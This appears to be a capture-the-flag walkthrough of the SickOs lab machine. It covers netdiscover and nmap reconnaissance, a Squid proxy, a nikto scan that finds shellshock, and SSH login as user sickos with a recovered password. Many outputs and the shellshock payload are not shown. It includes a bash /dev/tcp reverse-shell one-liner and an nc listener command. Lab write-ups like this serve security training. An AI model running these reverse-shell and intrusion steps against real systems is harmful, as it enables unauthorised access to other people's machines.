Use netdiscover to detect target IP address
netdiscover -i eth0 -r 192.168.79.0/24
192.168.79.178 is the target.
Then run nmap to detect opening ports and running services on the target machine.
nmap -sV -v -O -A -T5 192.168.79.178 -p-
Looks like port 22 and port 3218 are openning. Port 3218 is running Squid. open msfconsole, search squid. I found that:
Then use this module to scan the squid service:
Looks like port 80 is opened:
Use FoxyProxy add-on to configure proxy:
now visit http://192.168.79.178
now let’s use nikto to scan the server:
looks like there is a shellshock vuln
Let’s test it:
It works and looks there is an account sickos.
Now lets setup reverse shell.
netcat-style shell access without netcat:
/bin/bash -i > /dev/tcp/[yourip]/[port] 0<&1
in one terminal:
nc -nlvp 4444
in another terminal:
get the shell:
After Enumeration, got a interesting file:
Looks like the password is
SSH to the target server as sickos and use this password:
Check sickos’s privilege:
Looks like it can run as root